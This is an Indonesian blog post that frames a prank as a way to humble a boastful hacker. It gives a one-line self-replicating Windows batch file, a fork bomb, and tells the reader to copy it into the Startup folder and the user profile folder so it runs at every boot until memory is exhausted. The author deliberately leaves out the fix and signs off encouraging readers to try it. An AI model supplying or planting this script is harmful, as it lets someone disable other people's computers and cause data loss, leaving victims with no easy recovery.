Menumbangkan Kesombongan dengan 10 huruf

Senin, 27 September 2010

INFO!Bila anda seorang IT, Hacker, programming or ahli komputer, jangan terlalu menyombongkan diri karena dengan 10 huruf anda bisa dapat malu. Teknik ini ternyata laris dikalangan anak remaja yang notabene mash hijau untuk urusan cracker! Ceritanya seperti ini:
Setahun yang lalu waktu saya jalan2 n cuci mata di Malioboro (Jogja) saya ketemu sama mas 4li3n (eh ktm sitenya mas 4li3n mksdnyah) lupa tanggal dan jam berapa
yang jelas ada sesuatu yang bikin saya tertarik. Ceritanya mas 4L13N kenalan sama Kawan temennya dia…selidik punya selidik kenalan barunya ini agak sombong, dia ngaku2 pernah ngeHack inilah itulah….singkat cerita mas 4L13N menjajal kesombongan kawan temennya itu,,,dan ternyata sesumbar itu bisa di tumbangkan hanya dengan SEPULUH huruf yang hanya di tulis dengan notepad. mau tau skripnya???
sebelumnya saya minta maaf buat mas 4L13N, sebab saya publikasikan cerita dia tanpa seijinnya, dimaafkan yah mas…
SKRIPTNYA______________________________
buka notepad, tulis sepuluh huruf seperti di bawah…
start x.bat
Simpan dengan nama x.bat, kemudian copy kedalam folder startup yang berada pada direktory C:\Documents and Settings\All Users\Start Menu\Programs\Startup
Copykan juga file x.bat pada directory C:\Documents and Settings\”Nama Users” misalkan dikomputer saya C:\Documents and Settings\Nope’X
Penjelasannya sangat sederhana,,,,folder startup adalah folder pertama kali yang dipanggil oleh System Operasi ketika pertama kali windows berjalan…anda sudah bisa menebak bukan??? jika fle x.bat tersebut dipanggil maka secara otomatis file tersebut memanggil dirinya sendiri, secara berulang-ulang…begitu seterusnya sampe batas maksimal memori yang dimiliki komputer yang menjalankan x.bat itu..
Dahsyat bukan????
saya tidak menyarankan anda untuk mencoba2 pada komputer orang lain, silahkan anda coba pada komputer anda sendiri, dan saya juga tidak bertanggungjawab jika ada kerusakan yang diakibatkan karena ulah anda….
sengaja tidak saya sertakan cara menanganinya…karena saya menganggap ini sangat sederhana, so silahkan anda cari sendiri solusinya, berani berbuat harus berani bertanggung jawab otreee…
sebagai bocoran penawar, silahkan anda cari tempat dimana hanya program asli windows yang dapat berjalan, kl anda bisa mengakses itu, berarti kunci penawar sudah ada ditangan..
selamat mencoba ya..

0 komentar: